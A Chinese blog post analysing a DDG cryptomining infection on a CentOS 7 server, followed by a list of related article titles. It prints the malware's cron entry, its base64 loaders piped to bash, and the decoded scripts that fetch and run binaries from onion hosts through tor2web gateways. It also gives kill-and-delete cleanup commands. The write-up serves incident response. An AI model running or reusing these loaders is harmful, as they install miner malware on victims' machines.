CentOS7 服务器分析挖矿病毒,清理挖矿病毒 tor2web
特征如下:
CPU占用一直比较高,初步分析是挖矿程序:
系统的crontab –l显示调度列表如下:
20 * * * * /root/.aliyun.sh >/dev/null 2>&1
查看脚本内容:
#!/bin/bash
exec &>/dev/null
echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KdD10cnVtcHM0YzRvaHh2cTdvCmRpcj0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmZvciBpIGluIC91c3IvYmluICRkaXIgL2Rldi9zaG0gL3RtcCAvdmFyL3RtcDtkbyB0b3VjaCAkaS9pICYmIGNkICRpICYmIHJtIC1mIGkgJiYgYnJlYWs7ZG9uZQp4KCkgewpmPS9pbnQKZD0uLyQoZGF0ZXxtZDVzdW18Y3V0IC1mMSAtZC0pCndnZXQgLXQxIC1UMTAgLXFVLSAtLW5vLWNoZWNrLWNlcnRpZmljYXRlICQxJGYgLU8kZCB8fCBjdXJsIC1tMTAgLWZzU0xrQS0gJDEkZiAtbyRkCmNobW9kICt4ICRkOyRkO3JtIC1mICRkCn0KdSgpIHsKeD0vY3JuCndnZXQgLXQxIC1UMTAgLXFVLSAtTy0gLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAkMSR4IHx8IGN1cmwgLW0xMCAtZnNTTGtBLSAkMSR4Cn0KZm9yIGggaW4gdG9yMndlYi5pbyA0dG9yLm1sIG9uaW9uLm1uIG9uaW9uLmluLm5ldCBvbmlvbi50byBkMndlYi5vcmcgY2l2aWNsaW5rLm5ldHdvcmsgb25pb24ud3Mgb25pb24ubnogb25pb24uZ2xhc3MgdG9yMndlYi5zdQpkbwppZiAhIGxzIC9wcm9jLyQoY2F0IC90bXAvLlgxMS11bml4LzAwKS9pbzsgdGhlbgp4IHRydW1wczRjNG9oeHZxN28uJGgKZWxzZQpicmVhawpmaQpkb25lCgppZiAhIGxzIC9wcm9jLyQoY2F0IC90bXAvLlgxMS11bml4LzAwKS9pbzsgdGhlbgooCnUgJHQudG9yMndlYi5pbyB8fAp1ICR0LjR0b3IubWwgfHwKdSAkdC5kMndlYi5vcmcgfHwKdSAkdC5vbmlvbi5tbiB8fAp1ICR0Lm9uaW9uLmluLm5ldCB8fAp1ICR0Lm9uaW9uLnRvIHx8CnUgJHQuY2l2aWNsaW5rLm5ldHdvcmsgfHwKdSAkdC5vbmlvbi5wZXQgfHwKdSAkdC50b3Iyd2ViLnN1IHx8CnUgJHQub25pb24uZ2xhc3MgfHwKdSAkdC5vbmlvbi53cwopfGJhc2gKZmkK|base64 -d|bash
使用bash64解密后内容:
exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
t=trumps4c4ohxvq7o
dir=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
for i in /usr/bin $dir /dev/shm /tmp /var/tmp;do touch $i/i && cd $i && rm -f i && break;done
x() {
f=/int
d=./$(date|md5sum|cut -f1 -d-)
wget -t1 -T10 -qU- --no-check-certificate $1$f -O$d || curl -m10 -fsSLkA- $1$f -o$d
chmod +x $d;$d;rm -f $d
}
u() {
x=/crn
wget -t1 -T10 -qU- -O- --no-check-certificate $1$x || curl -m10 -fsSLkA- $1$x
}
for h in tor2web.io 4tor.ml onion.mn onion.in.net onion.to d2web.org civiclink.network onion.ws onion.nz onion.glass tor2web.su
do
if ! ls /proc/$(cat /tmp/.X11-unix/00)/io; then
x trumps4c4ohxvq7o.$h
else
break
fi
doneif ! ls /proc/$(cat /tmp/.X11-unix/00)/io; then
(
u $t.tor2web.io ||
u $t.4tor.ml ||
u $t.d2web.org ||
u $t.onion.mn ||
u $t.onion.in.net ||
u $t.onion.to ||
u $t.civiclink.network ||
u $t.onion.pet ||
u $t.tor2web.su ||
u $t.onion.glass ||
u $t.onion.ws
)|bash
Fi
结合腾讯安全预警: https://cloud.tencent.com/developer/article/1402851
http://bbs.qcloud.com/thread-30706-1-1.html?_ga=1.176497829.1600736125.1550482092
分析是DDG挖矿木马病毒。
此外,发现.ssh下的known_hosts被添加如下一条公钥记录
主机hosts中也添加了如下记录:
0.0.0.0 aliyun.one
0.0.0.0 lsd.systemten.org
0.0.0.0 pastebin.com
0.0.0.0 pm.cpuminerpool.com
0.0.0.0 systemten.org
此外,病毒还会在后台设置守护进程,查看方式
ls -al /tmp/.X11-unix/
查看该目录下的 00、11、22内容可以看到几个数字,00文件存放病毒守护进程pid、11文件存放病毒运行进程pid、22为一个空文件,功能暂时不清楚。
9423为病毒守护进程pid
15043为病毒正在运行的pid
可以看到守护进程内容
sh -c echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCmQ9JChncmVwIHg6JChpZCAtdSk6IC9ldGMvcGFzc3dkfGN1dCAtZDogLWY2KQpjPSQoZWNobyAiY3VybCAtNGZzU0xrQS0gLW0yMDAiKQp0PSQoZWNobyAidHJ1bXB6d2x2bHlydmxzcyIpCgpzb2NreigpIHsKcD0kKGVjaG8gImRucy1xdWVyeT9uYW1lPXJlbGF5LnRvcjJzb2Nrcy5pbiIpCnM9JCgoJGMgaHR0cHM6Ly9kb2guY2VudHJhbGV1LnBpLWRucy5jb20vJHAgfHwKICAgICAkYyBodHRwczovL2Rucy50d25pYy50dy8kcCB8fAogICAgICRjIGh0dHBzOi8vZG5zLnJ1YnlmaXNoLmNuLyRwIHx8CiAgICAgJGMgaHR0cHM6Ly9kb2guZG5zLnNiLyRwIDsgaG9zdCAtVyA1IHJlbGF5LnRvcjJzb2Nrcy5pbnxhd2sgeydwcmludCAkTkYnfSlcCiAgICAgfCBncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgfHRyICcgJyAnXG4nfHNvcnQgLXVSfGhlYWQgLTEgKQp9CgpmZXhlKCkgewpmb3IgaSBpbiAkZCAvdG1wIC92YXIvdG1wIC9kZXYvc2htIC91c3IvYmluIDtkbyBlY2hvIGV4aXQgPiAkaS9pICYmIGNobW9kICt4ICRpL2kgJiYgY2QgJGkgJiYgLi9pICYmIHJtIC1mIGkgJiYgYnJlYWs7ZG9uZQp9Cgp1KCkgewpzb2NregpmZXhlCmY9L2NwdQp4PS4vJChkYXRlfG1kNXN1bXxjdXQgLWYxIC1kLSkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IHx8ICRjICQxJGYgLW8keApjaG1vZCAreCAkeDskeDtybSAtZiAkeAp9Cgpmb3IgaCBpbiB0b3Iyd2ViLmluIHRvcjJ3ZWIuaW8gdG9yMndlYi50byB0b3Iyd2ViLnN1CmRvCmlmICEgbHMgL3Byb2MvJChoZWFkIC0xIC90bXAvLlgxMS11bml4LzExKS9pbzsgdGhlbgp1ICR0LiRoCmVsc2UKYnJlYWsKZmkKZG9uZQo= |base64 -d|bash
使用base64解密后内容如下:
exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbind=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "trumpzwlvlyrvlss")sockz() {
p=$(echo "dns-query?name=relay.tor2socks.in")
s=$(($c https://doh.centraleu.pi-dns.com/$p ||$c https://dns.twnic.tw/$p ||$c https://dns.rubyfish.cn/$p ||$c https://doh.dns.sb/$p ; host -W 5 relay.tor2socks.in|awk {'print $NF'})\| grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|sort -uR|head -1 )
}fexe() {
for i in $d /tmp /var/tmp /dev/shm /usr/bin ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}u() {
sockz
fexe
f=/cpu
x=./$(date|md5sum|cut -f1 -d-)
$c -x socks5h://$s:9050 $t.onion$f -o$x || $c $1$f -o$x
chmod +x $x;$x;rm -f $x
}for h in tor2web.in tor2web.io tor2web.to tor2web.su
do
if ! ls /proc/$(head -1 /tmp/.X11-unix/11)/io; then
u $t.$h
else
break
fi
done
内容还是比较清晰的。
清理病毒:
kill -9 35138 && kill -9 9423 && rm -rf /etc/cron.d/0wlvly && rm -rf /var/spool/cron/root && chattr -i /root/.wlvly.sh && rm -rf /root/.wlvly.sh && chattr -i /opt/wlvly.sh && rm -rf /opt/wlvly.sh
创建免疫文件夹,防止再次感染:
mkdir /root/wlvly.sh && chmod 000 /root/wlvly.sh && mkdir /opt/wlvly.sh && chmod 000 /opt/wlvly.sh
最近发现该病毒换个文件名.systemd-service.sh,找到病毒进程pid后清理过程如下:
kill -9 26062 && rm -rf /etc/cron.d/0systemd-service && rm -rf /var/spool/cron/root && chattr -i /root/.systemd-service.sh && rm -rf /root/.systemd-service.sh && chattr -i /opt/systemd-service.sh && rm -rf /opt/systemd-service.shmkdir /root/systemd-service.sh && chmod 000 /root/systemd-service.sh && mkdir /opt/systemd-service.sh && chmod 000 /opt/systemd-service.sh
CentOS7 服务器分析挖矿病毒,清理挖矿病毒 tor2web相关推荐
- 记一次Linux服务器因redis漏洞的挖矿病毒入侵
中毒原因,redis bind 0.0.0.0 而且没有密码,和安全意识太薄弱. 所以,redis一定要设密码,改端口,不要用root用户启动,如果业务没有需要,不要bind 0.0.0.0!!!!! ...
- Linux挖矿病毒清理流程
Linux挖矿病毒清理流程 1.前言: 根据阿里云快讯病毒公布: Redis RCE导致h2Miner蠕虫病毒,其利用Redis未授权或弱口令作为入口,使用主从同步的方式从恶意服务器上同步恶意modu ...
- 病毒分析之“驱动人生”挖矿木马分析及其清除方案
"驱动人生"挖矿木马分析及其清除方案 0x00 概述 自2018年12月份"驱动人生"挖矿木马爆发以来,此木马一直处于活跃状态,更新版本更是达到了20+次.此木 ...
- 排查通过服务器中 redis 的漏洞植入 pnscan 病毒进行挖矿
1 描述 最近买了一台云服务器进行学习研究,然后装了 redis,怎想到了某天晚上 22:00 开始服务器就卡顿了,输入命令半天没响应,然后重新连接则多次超时.最后连接上去了,输入命令 uptim ...
- android.troj.opfake.a病毒,FakeMsdMiner挖矿病毒分析报告
原标题:FakeMsdMiner挖矿病毒分析报告 近日,亚信安全截获新型挖矿病毒FakeMsdMiner,该病毒利用永恒之蓝,永恒浪漫等NSA漏洞进行攻击传播.该病毒具有远控功能,可以获取系统敏感信息 ...
- ubuntu清理挖矿病毒
0 序言 我之前搭建的hadoop用于测试,直接使用了8088和9870端口,没有放入docker,从而没有端口映射.于是,就被不法之徒盯上了,hadoop被提交了很多job,使得系统被感染了挖矿病毒 ...
- Centos/Debian 占用CPU100%挖矿病毒清理
Cetnos/Debian 占用CPU100%挖矿病毒清理 ①top命令查看病毒进程,现在它一般由十位数随机字符串组成 找到进程ID,例如7538,执行: systemctl status 7538 ...
- python挖矿脚本_windows应急响应 -- powershell挖矿病毒清理办法
一.关于powershell挖矿病毒 在2019年4月22号,对公司几台服务器进行进行病毒排查,发现有两台windows服务器CPU使用过高,查看进行时发现poweshell进程占用CPU, 通过百度 ...
- 云服务器CPU一直高占用,病毒排查,服务器被黑,服务器中挖矿病毒,挖矿机xmrig病毒排查及解决
收到阿里云发来的通知"[挖矿处置通知]请尽快整改云服务挖矿活动","经检测您的阿里云服务器上存在疑似挖矿活动--";盖帽的话不说了,直接上排查思路及解决方法: ...
最新文章
- Windows Server 2003 (64bit)操作系统上部署 ArcSDE 9.2
- 深度学习之自编码器(2)Fashion MNIST图片重建实战
- Sigma IDE现在支持Python无服务器Lambda函数!
- JDK8利用Stream为集合对象分组并编号
- Spring框架是如何判断是否是上传文件请求呢
- python数据库操作封装_Python 封装一个操作mysql的类
- pycharm如何设置python版本、设置国内pip镜像、添加第三方类库
- java 中的 long
- linux恢复rm删除文件ssd,科学网—linux恢复rm -rf删除的文件 - 罗晓光的博文
- history.go(-1)返回页面后,此页面中的input标签隐藏域中的值消失
- 决策树(八)--随机森林及OpenCV源码分析
- 打开.mpp文件有感
- 改进初学者的PID-测量的比例编码
- 解决eNSP“错误代码40”及AR设备启动失败问题
- 回收站的文件删了怎么恢复,回收站文件恢复的两种方法
- SQL练习题附重点函数说明--更新至21题
- w7计算机不显示cdf盘,微软解决Win7 SP1新黑屏问题(0xc0000034)
- 电脑上打开chm文件时系统提示:不能打开文件:mk:@MSITStore:(文件路径)
- 区块链主流开源技术体系介绍(转)
- 计算机的未来发展趋势
热门文章
- 关学生使用计算机心得,关于计算机课的心得体会范文
- 数据分析-网络爬虫:中美在这一领域展开无声较量,事关国家安全
- 花3个月面过华为测开岗,拿个30K不过分吧?
- Error running ‘Tomcat 8.5.31’: Unable to open debugger port (127.0.0.1:52506
- dede image.class.php,摘自织梦CMS中的图片处理类
- 计算机金融sci,经济金融类SSCISCI 四区类(垃圾类)杂志汇总,欢迎补充
- TP-Link WR703N升级64M内存+外接SMA天线+刷OpenWRT(1)硬件介绍
- STM32_FOC_4_如何获得Park变换中的θ角-即电机的电角度_Plus
- 记录一下前端针对下载文件的两种请求方式
- 华大单片机HC32L136X单片机flash数据读写操作使用